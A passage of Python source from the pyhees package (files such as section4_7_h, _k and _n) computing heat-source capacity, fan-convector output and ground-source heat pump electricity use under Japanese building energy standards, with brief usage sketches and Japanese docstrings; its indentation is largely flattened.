def get_P_rtd_hs(q_rtd_hs, e_rtd):
"""定格消費電力 (4)
Args:
q_rtd_hs(float): 温水暖房用熱源機の定格能力 (W)
        e_rtd(float): 当該熱源機の定格効率
Returns:
float: 定格消費電力
"""
return q_rtd_hs / e_rtd
def get_e_rtd():
"""定格効率
Args:
Returns:
float: 定格効率
"""
return 4.05
def calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""定格能力 (5)
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 定格能力 (5)
"""
# 最大能力
q_max_hs = appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
return q_max_hs * 0.8
def get_e_r_hs(Theta_SW_hs, Theta_ex, Q_out_H_hs, Q_max_H_hs):
"""1時間平均の効率比 (6)
Args:
Theta_SW_hs(ndarray): 温水暖房用熱源機の往き温水温度
Theta_ex(ndarray): 外気温度
Q_out_H_hs(ndarray): 1時間当たりの温水暖房用熱源機の暖房出力 (MJ/h)
Q_max_H_hs(ndarray): 熱源機の最大暖房出力 (MJ/h)
Returns:
ndarray: 1時間平均の効率比 (6)
"""
return (1.120656 - 0.03703 * (Theta_SW_hs - Theta_ex)) * (1 - Q_out_H_hs / Q_max_H_hs) ** 2 \
+ (-0.36786 + 0.012152 * (Theta_SW_hs - Theta_ex)) * (1 - Q_out_H_hs / Q_max_H_hs) \
+ 1
# ============================================================================
# D.2.2 ガス消費量
# ============================================================================
def get_E_G_hs():
"""ガス消費量
Args:
Returns:
ndarray: ガス消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# D.2.3 灯油消費量
# ============================================================================
def get_E_K_hs():
"""灯油消費量
Args:
Returns:
ndarray: 灯油消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# D.2.4 その他の一次エネルギー消費量
# ============================================================================
def get_E_M_hs():
"""
Args:
Returns:
ndarray: その他の一次エネルギー消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# D.3 最大暖房出力
# ============================================================================
def calc_Q_max_H_hs(q_rtd_hs, Theta_SW_hs, Theta_ex, h_ex):
"""最大暖房出力 (7)
Args:
q_rtd_hs(float): 温水暖房用熱源機の定格能力 (W)
Theta_SW_hs(ndarray): 温水暖房用熱源機の往き温水温度
Theta_ex(ndarray): 外気温度
h_ex(ndarray): 外気相対湿度
Returns:
最大暖房出力 (7)
"""
# デフロスト補正係数
C_def = get_C_def(Theta_ex, h_ex)
return (11.62 + 0.2781 * Theta_ex - 0.00113 * Theta_ex ** 2 - 0.1271 * Theta_SW_hs - 0.00363 * Theta_ex * Theta_SW_hs) \
* (q_rtd_hs / 6) * (C_def / 0.85) * 3600 * 10 ** (-6)
def get_C_def(Theta_ex, h_ex):
"""デフロスト補正係数
Args:
Theta_ex(ndarray): 外気温度
h_ex(ndarray): 外気相対湿度
Returns:
ndarray: デフロスト補正係数
"""
C_def = np.zeros(24 * 365)
C_def[:] = 1
C_def[(Theta_ex < 5) * (h_ex >= 80)] = 0.85
return C_def
```
#### File: src/pyhees/section4_7_h.py
```python
from pyhees.section3_1 import get_A_HCZ_i
# ============================================================================
# H.2 温水暖房用熱源機の最大能力
# ============================================================================
def calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""温水暖房用熱源機の最大能力 (1)
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
        has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
        has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 温水暖房用熱源機の最大能力 (W)
"""
# 単位面積当たりの必要暖房能力
q_rq_H = get_q_rq_H(region, has_MR_hwh, has_OR_hwh)
# 外気温度補正係数
f_cT = get_f_cT()
# 間歇運転能力補正係数
f_cI = get_f_cI(mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 暖冷房区画の床面積(温水暖房により暖 房される暖冷房区画のみを積算する)
A_HCZ_hs = 0
if has_MR_hwh:
A_HCZ_hs = get_A_HCZ_i(1, A_A, A_MR, A_OR)
if has_OR_hwh:
A_HCZ_hs = A_HCZ_hs + sum([get_A_HCZ_i(i, A_A, A_MR, A_OR) for i in range(2, 6)])
return q_rq_H * A_HCZ_hs * f_cT * f_cI
def get_q_rq_H(region, has_MR_hwh, has_OR_hwh):
"""単位面積当たりの必要暖房能力 (W/m2)
Args:
region(int): 省エネルギー地域区分
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 単位面積当たりの必要暖房能力 (W/m2)
"""
if has_MR_hwh and has_OR_hwh:
return get_table_h_3()[region - 1][0]
elif has_MR_hwh:
return get_table_h_3()[region - 1][1]
elif has_OR_hwh:
return get_table_h_3()[region - 1][2]
else:
raise ValueError('温水暖房の放熱器を主たる居室にもその他の居室にも設置しない場合の単位面積当たりの必要暖房能力は定義されません。')
def get_f_cT():
"""外気温度補正係数
Args:
Returns:
float: 外気温度補正係数
"""
return 1.05
def get_f_cI(mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""間歇運転能力補正係数
Args:
mode_MR(str): 主たる居室の運転方法 (連続運転|間歇運転)
mode_OR(str): その他の居室の運転方法 (連続運転|間歇運転)
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 間歇運転能力補正係数
"""
def normalize_mode(s):
"""
Args:
s:
Returns:
"""
if s == 'は':
return '間歇運転'
if s == 'ろ':
return '連続運転'
return s
mode_MR = normalize_mode(mode_MR)
mode_OR = normalize_mode(mode_OR)
if has_MR_hwh and has_OR_hwh:
if mode_MR == '連続運転':
if mode_OR == '連続運転':
return get_table_h_4()[0]
elif mode_OR == '間歇運転':
return get_table_h_4()[1]
else:
raise ValueError(mode_OR)
elif mode_MR == '間歇運転':
if mode_OR == '連続運転':
return get_table_h_4()[2]
elif mode_OR == '間歇運転':
return get_table_h_4()[3]
else:
                raise ValueError(mode_OR)
else:
raise ValueError(mode_MR)
elif has_MR_hwh:
if mode_MR == '連続運転':
return get_table_h_4()[4]
elif mode_MR == '間歇運転':
return get_table_h_4()[5]
else:
raise ValueError(mode_MR)
elif has_OR_hwh:
if mode_OR == '連続運転':
return get_table_h_4()[6]
elif mode_OR == '間歇運転':
return get_table_h_4()[7]
        else:
            raise ValueError(mode_OR)
    else:
        raise ValueError('温水暖房の放熱器を主たる居室にもその他の居室にも設置しない場合の間歇運転能力補正係数は定義されません。')
def get_table_h_3():
"""表 H.3 単位面積当たりの必要暖房能力
Args:
Returns:
list: 表 H.3 単位面積当たりの必要暖房能力
"""
table_h_3 = [
(90.02, 139.26, 62.28),
(77.81, 120.65, 53.26),
(73.86, 111.32, 53.81),
(77.74, 118.98, 55.41),
(83.24, 126.56, 59.43),
(69.76, 106.48, 49.94),
(74.66, 112.91, 53.48)
]
return table_h_3
def get_table_h_4():
"""表 H.4 間歇運転能力補正係数
Args:
Returns:
list: 表 H.4 間歇運転能力補正係数
"""
table_h_4 = [
1.0,
1.0,
2.25,
2.25,
1.0,
3.03,
1.0,
1.62
]
return table_h_4
```
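A sketch of the appendix-H capacity calculation, using example floor areas and intermittent operation ('は') in both room groups; it assumes `pyhees.section3_1` is importable because `get_A_HCZ_i` is called internally:
```python
from pyhees.section4_7_h import calc_q_max_hs

q_max_hs = calc_q_max_hs(region=6, A_A=120.08, A_MR=29.81, A_OR=51.34,
                         mode_MR='は', mode_OR='は',
                         has_MR_hwh=True, has_OR_hwh=True)
print(q_max_hs)  # maximum capacity of the hot-water heating heat source, W
```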
#### File: src/pyhees/section4_7_k.py
```python
import numpy as np
import pyhees.section4_7_m as appendix_M
# ============================================================================
# K.2 消費電力量
# ============================================================================
def calc_E_E_rad(region, mode, A_HCZ, R_type, Theta_SW, Q_T_H_rad):
"""放熱器の消費電力量 (1)
Args:
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
A_HCZ(float): 暖冷房区画の床面積
R_type(string): 居室の形式
Theta_SW(ndarray): 往き温水温度 (℃)
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Returns:
ndarray: 放熱器の消費電力量 (1)
"""
# ファンコンベクターの最大能力及び最小能力
q_max_FC = calc_q_max_FC(region, mode, A_HCZ, R_type)
q_min_FC = get_q_min_FC(q_max_FC)
# ファンコンベクターの最大暖房出力及び最小暖房出力
Q_max_H_FC = get_Q_max_H_FC(Theta_SW, q_max_FC)
Q_min_H_FC = get_Q_min_H_FC(Theta_SW, q_min_FC)
# ファンコンベクターの最大消費電力及び最小消費電力
P_max_FC = get_P_max_FC(q_max_FC)
P_min_FC = get_P_min_FC(q_min_FC)
# (1a)
tmp_1a = P_min_FC * (Q_T_H_rad / Q_min_H_FC) * 10 ** (-3)
tmp_1a[np.logical_not(Q_T_H_rad <= Q_min_H_FC)] = 0
# (1b)
tmp_1b = (P_min_FC * (Q_max_H_FC - Q_T_H_rad) / (Q_max_H_FC - Q_min_H_FC) + P_max_FC * (Q_T_H_rad - Q_min_H_FC) / (
Q_max_H_FC - Q_min_H_FC)) * 10 ** (-3)
tmp_1b[np.logical_not(np.logical_and(Q_min_H_FC < Q_T_H_rad, Q_T_H_rad < Q_max_H_FC))] = 0
# (1c)
tmp_1c = P_max_FC * 10 ** (-3) * np.ones_like(Q_T_H_rad)
tmp_1c[np.logical_not(Q_max_H_FC <= Q_T_H_rad)] = 0
E_E_rad = tmp_1a + tmp_1b + tmp_1c
return E_E_rad
# ============================================================================
# K.3 温水供給運転率
# ============================================================================
def get_r_WS_rad(Q_T_H_rad, Q_min_H_FC):
"""温水供給運転率 (2)
Args:
Q_T_H_rad(ndarray): 1時間当たりの放熱器の処理暖房負荷 (MJ/h)
Q_min_H_FC(ndarray): 1時間当たりのファンコンベクターの最小暖房出力 (MJ/h)
Returns:
ndarray: 温水供給運転率
"""
return Q_T_H_rad / Q_min_H_FC
# ============================================================================
# K.4 最大暖房出力
# ============================================================================
def calc_Q_max_H_rad(Theta_SW, q_max_FC):
"""最大暖房出力
Args:
Theta_SW(ndarray): 往き温水温度 (℃)
q_max_FC(ndarray): ファンコンベクターの最大能力 (W)
Returns:
ndarray: 最大暖房出力
"""
return get_Q_max_H_FC(Theta_SW, q_max_FC)
# ============================================================================
# K.5 ファンコンベクターの最大暖房出力及び最小暖房出力
# ============================================================================
def get_Q_max_H_FC(Theta_SW, q_max_FC):
"""ファンコンベクターの最大暖房出力 (3a)
Args:
Theta_SW(ndarray): 往き温水温度 (℃)
q_max_FC(ndarray): ファンコンベクターの最大能力(W)
Returns:
ndarray: ファンコンベクターの最大暖房出力 (3a)
"""
return q_max_FC * (Theta_SW - 20) / (60 - 20) * 3600 * 10 ** (-6)
def get_Q_min_H_FC(Theta_SW, q_min_FC):
"""ファンコンベクターの最小暖房出力 (3b)
Args:
Theta_SW(ndarray): 往き温水温度 (℃)
q_min_FC(ndarray): ファンコンベクターの最小能力 (W)
Returns:
ndarray: ファンコンベクターの最小暖房出力 (3b)
"""
return q_min_FC * (Theta_SW - 20) / (60 - 20) * 3600 * 10 ** (-6)
def calc_q_max_FC(region, mode, A_HCZ, R_type):
"""ファンコンベクターの最大能力
Args:
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
A_HCZ(float): 暖冷房区画の床面積
R_type(string): 居室の形式
Returns:
ndarray: ファンコンベクターの最大能力
"""
# 付録Mに定める放熱器の最大能力 q_max_rad に等しいものとする
return appendix_M.calc_q_max_rad(region, mode, A_HCZ, R_type)
def get_q_min_FC(q_max_FC):
"""ファンコンベクターの最小能力 (4)
Args:
q_max_FC(ndarray): ファンコンベクターの最大能力 (W)
Returns:
ndarray: ファンコンベクターの最小能力
"""
return 0.4859 * q_max_FC
# ============================================================================
# K.6 ファンコンベクターの最大消費電力及び最小消費電力
# ============================================================================
def get_P_max_FC(q_max_FC):
"""ファンコンベクターの最大消費電力 (5a)
Args:
q_max_FC(ndarray): ファンコンベクターの最大能力 (W)
Returns:
        ndarray: ファンコンベクターの最大消費電力
"""
return 7.564 * 10 ** (-3) * q_max_FC
def get_P_min_FC(q_min_FC):
"""ファンコンベクターの最小消費電力 (5b)
Args:
q_min_FC(ndarray): ファンコンベクターの最小能力 (W)
Returns:
ndarray: ファンコンベクターの最小消費電力
"""
return 7.783 * 10 ** (-3) * q_min_FC
```
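A sketch of the fan-convector relations with an assumed maximum capacity of 4,000 W and a constant 60 °C supply temperature; in a real calculation the capacity would come from `calc_q_max_FC` (appendix M):
```python
import numpy as np
from pyhees.section4_7_k import (get_q_min_FC, get_Q_max_H_FC, get_Q_min_H_FC,
                                 get_P_max_FC, get_P_min_FC)

q_max_FC = 4000.0                   # assumed maximum capacity, W
q_min_FC = get_q_min_FC(q_max_FC)
Theta_SW = np.full(24 * 365, 60.0)  # supply water temperature, °C

print(get_Q_max_H_FC(Theta_SW, q_max_FC)[0], get_Q_min_H_FC(Theta_SW, q_min_FC)[0])  # MJ/h
print(get_P_max_FC(q_max_FC), get_P_min_FC(q_min_FC))                                # W
```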
#### File: src/pyhees/section4_7_n.py
```python
import numpy as np
from pyhees.section4_7_common import get_Q_out_H_hs_d_t
from pyhees.section4_8_a import calc_e_ref_H_th
import pyhees.section4_7_h as appendix_H
# ============================================================================
# N3. 暖房エネルギー消費量
# ============================================================================
# ============================================================================
# N.3.1 消費電力量
# ============================================================================
def calc_E_E_hs_d_t(Q_dmd_H_hs_d_t, Theta_ex_a_Ave, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_SW_d_t, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType):
"""日付dの時刻tにおける1時間当たりの温水暖房用熱源機の消費電力量 (1)
Args:
Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h)
Theta_ex_a_Ave(float): 年平均外気温度 (℃)
Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃)
Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃)
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
        q_max_hs(float): 熱源機の最大暖房能力 (W)
L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
ndarray: 1時間当たりの熱源機の消費電力量 (kWh/h)
"""
# ---------- 地中熱交換器からの戻り熱源水の日平均温度 ----------
# 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i)
# 1日当たりの暖房負荷の年間最大値(MJ/d)(20b)
L_max_H = get_L_max_H(L_H_x_t_i)
# 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
R_L_max = get_R_L_max(L_max_H, L_max_C)
# 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType)
# 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18)
Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType)
# 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17)
Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H)
# ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 ----------
# 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(16)
q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs)
# ---------- 温水暖房用熱源機内の平均放熱損失 ----------
# 日付dの時刻tにおける温水暖房用の熱源機内部の平均放熱損失 (kw) (N.9)
q_loss_H_hs_d_t = get_q_loss_H_hs_d_t()
# ---------- 温水暖房用熱源機の平均暖房出力 ----------
# 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15)
Q_max_H_hs_d_t = calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType)
# 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14)
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13)
q_out_H_hs_d_t = get_q_out_H_hs_d_t(Q_out_H_hs_d_t)
# ---------- 温水暖房用熱源機の最大暖房能力に対する平均負荷率 ----------
# 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12)
qr_out_H_hs_d_t = get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA)
# ---------- 補機の消費電力量 ----------
# 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a)
E_aux_hs_d_t = calc_E_aux_hs_d_t(qr_out_H_hs_d_t)
# ---------- ポンプの消費電力量 ----------
# 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量 (kWh/h) (10a)
E_pump_gsRW_d_t = calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t)
# 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量 (kWh/h) (9a)
E_pump_SW_d_t = calc_E_pump_SW_d_t(qr_out_H_hs_d_t)
# 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (kWh/h) (8)
E_pump_hs_d_t = get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t)
# ---------- 圧縮機の消費電力量 ----------
    # 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a)
    Theta_ref_SH_d_t = calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d)
    # 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a)
    Theta_ref_SC_d_t = calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t)
# 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a)
Theta_ref_cnd_d_t = calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t)
# 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(4a)
Theta_ref_evp_d_t = calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d)
# 日付dの時刻tにおける1時間当たりの圧縮機の圧縮効率 (-) (3a)
Mu_d_t = calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t)
# 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (kWh/h) (2)
E_comp_hs_d_t, _ = get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t)
# ---------- 熱源機の消費電力量 ----------
# 1時間当たりの熱源機の消費電力量 (kWh/h) (1)
E_E_hs_d_t = E_comp_hs_d_t + E_pump_hs_d_t + E_aux_hs_d_t
E_E_hs_d_t[q_out_H_hs_d_t == 0] = 0
return E_E_hs_d_t
# ============================================================================
# N.3.2 ガス消費量
# ============================================================================
def get_E_G_hs_d_t():
"""熱源機のガス消費量
Args:
Returns:
ndarray: 熱源機のガス消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# N.3.3 灯油消費量
# ============================================================================
def get_E_K_hs_d_t():
"""熱源機の灯油消費量
Args:
Returns:
ndarray: 熱源機の灯油消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# N.3.4 その他の一次エネルギー消費量
# ============================================================================
def get_E_M_hs_d_t():
"""熱源機のその他の燃料の一次エネルギー消費量
Args:
Returns:
ndarray: 熱源機のその他の燃料の一次エネルギー消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# N.4 圧縮機の消費電力量
# ============================================================================
def get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t):
"""日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
        q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)
        q_loss_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW)
        Mu_d_t(ndarray): 日付dの時刻tにおける圧縮機の圧縮効率(-)
        Theta_ref_evp_d_t(ndarray): 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)
        Theta_ref_cnd_d_t(ndarray): 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量
"""
# 圧縮機の消費電力に対する補正係数を計算する式の係数(-) (2c)
k_comp_a = -0.7309
k_comp_b = 0.67
k_comp_c = 1.0319
# 日付𝑑の時刻𝑡における圧縮機の消費電力に対する補正係数(-) (2b)
f_comp_act_d_t = np.clip(k_comp_a * qr_out_H_hs_d_t + (1 - k_comp_a * k_comp_b), 1, None) * k_comp_c
# 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2a)
E_comp_hs_d_t = f_comp_act_d_t * ((q_out_H_hs_d_t + q_loss_H_hs_d_t) / Mu_d_t)
E_comp_hs_d_t[Theta_ref_evp_d_t >= Theta_ref_cnd_d_t] = 0
return E_comp_hs_d_t, f_comp_act_d_t
def calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t):
"""日付dの時刻tにおける圧縮機の圧縮効率 (3a)
Args:
        Theta_ref_evp_d_t(ndarray): 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)
        Theta_ref_cnd_d_t(ndarray): 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)
Theta_ref_SC_d_t(ndarray): ヒートポンプサイクルの過冷却度(℃)
Theta_ref_SH_d_t(ndarray): ヒートポンプサイクルの過熱度(℃)
Returns:
ndarray: 日付dの時刻tにおける圧縮機の圧縮効率 (3a)
"""
# Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b)
K_Mu_h_0 = get_K_Mu_h_0()
# Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b)
K_Mu_h_1 = get_K_Mu_h_1()
# Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b)
K_Mu_h_2 = get_K_Mu_h_2()
# 日付dの時刻tにおけるヒートポンプサイクルの理論暖房効率(-) 4章8節付録A(1)
e_ref_H_th_d_t = calc_e_ref_H_th(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t)
# 日付dの時刻tにおける圧縮機の圧縮効率 (3a)
Mu_d_t = K_Mu_h_2 * (e_ref_H_th_d_t ** 2) + K_Mu_h_1 * e_ref_H_th_d_t + K_Mu_h_0
Mu_d_t[e_ref_H_th_d_t > 10] = K_Mu_h_2 * (10 ** 2) + K_Mu_h_1 * 10 + K_Mu_h_0
return Mu_d_t
def get_K_Mu_h_0():
"""Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b)
Args:
Returns:
float: Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b)
"""
return -0.430363368361459
def get_K_Mu_h_1():
"""Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b)
Args:
Returns:
float: Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b)
"""
return 0.698531770387591
def get_K_Mu_h_2():
"""Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b)
Args:
Returns:
float: Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b)
"""
return 0.0100164335768507
def calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d):
"""日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)
Returns:
日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a)
"""
# Kevph0:蒸発温度を計算する式の係数 (-) (4b)
K_evp_h_0 = get_K_evp_h_0()
# Kevph1:蒸発温度を計算する式の係数 (-) (4b)
K_evp_h_1 = get_K_evp_h_1()
# Kevph2:蒸発温度を計算する式の係数 (-) (4b)
K_evp_h_2 = get_K_evp_h_2()
# Kevph12:蒸発温度を計算する式の係数 (-) (4b)
K_evp_h_12 = get_K_evp_h_12()
# 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a)
Theta_ref_evp_d_t = np.clip(K_evp_h_0 + K_evp_h_1 * np.repeat(Theta_gsRW_d_ave_d, 24)
+ K_evp_h_2 * qr_out_H_hs_d_t
+ K_evp_h_12 * np.repeat(Theta_gsRW_d_ave_d, 24) * qr_out_H_hs_d_t, -50, None)
return Theta_ref_evp_d_t
def get_K_evp_h_0():
"""Kevph0:蒸発温度を計算する式の係数 (-) (4b)
Args:
Returns:
float: Kevph0:蒸発温度を計算する式の係数
"""
return -2.95315205817646
def get_K_evp_h_1():
"""Kevph1:蒸発温度を計算する式の係数 (-) (4b)
Args:
Returns:
float: Kevph1:蒸発温度を計算する式の係数
"""
return 0.915893610614308
def get_K_evp_h_2():
"""Kevph2:蒸発温度を計算する式の係数 (-) (4b)
Args:
Returns:
float: Kevph2:蒸発温度を計算する式の係数
"""
return -11.8319776584846
def get_K_evp_h_12():
"""Kevph12:蒸発温度を計算する式の係数 (-) (4b)
Args:
Returns:
float: Kevph12:蒸発温度を計算する式の係数
"""
return 0.29704275467947
def calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t):
"""日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a)
Args:
        qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Theta_SW_d_t(ndarray): 日付dの時刻tにおける往き温水温度(℃)
Returns:
ndarray: 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)
"""
# Kcndh0:凝縮温度を計算する式の係数 (-) (5b)
K_cnd_h_0 = get_K_cnd_h_0()
# Kcndh1:凝縮温度を計算する式の係数 (-) (5b)
K_cnd_h_1 = get_K_cnd_h_1()
# Kcndh2:凝縮温度を計算する式の係数 (-) (5b)
K_cnd_h_2 = get_K_cnd_h_2()
# Kcndh12:凝縮温度を計算する式の係数 (-) (5b)
K_cnd_h_12 = get_K_cnd_h_12()
# 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (5a)
Theta_ref_cnd_d_t = np.clip(K_cnd_h_0 + K_cnd_h_1 * Theta_SW_d_t
+ K_cnd_h_2 * qr_out_H_hs_d_t
+ K_cnd_h_12 * Theta_SW_d_t * qr_out_H_hs_d_t, None, 65)
return Theta_ref_cnd_d_t
def get_K_cnd_h_0():
"""Kcndh0:凝縮温度を計算する式の係数 (-) (5b)
Args:
Returns:
float: Kcndh0:凝縮温度を計算する式の係数
"""
return 3.6105623002886
def get_K_cnd_h_1():
"""Kcndh1:凝縮温度を計算する式の係数 (-) (5b)
Args:
Returns:
float: Kcndh1:凝縮温度を計算する式の係数
"""
return 0.930136847064537
def get_K_cnd_h_2():
"""Kcndh2:凝縮温度を計算する式の係数 (-) (5b)
Args:
Returns:
float: Kcndh2:凝縮温度を計算する式の係数
"""
return 0.494024927234563
def get_K_cnd_h_12():
"""Kcndh12:凝縮温度を計算する式の係数 (-) (5b)
Args:
Returns:
ndarray: Kcndh12:凝縮温度を計算する式の係数
"""
return 0.00770898511188855
def calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t):
"""日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
Returns:
ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)
"""
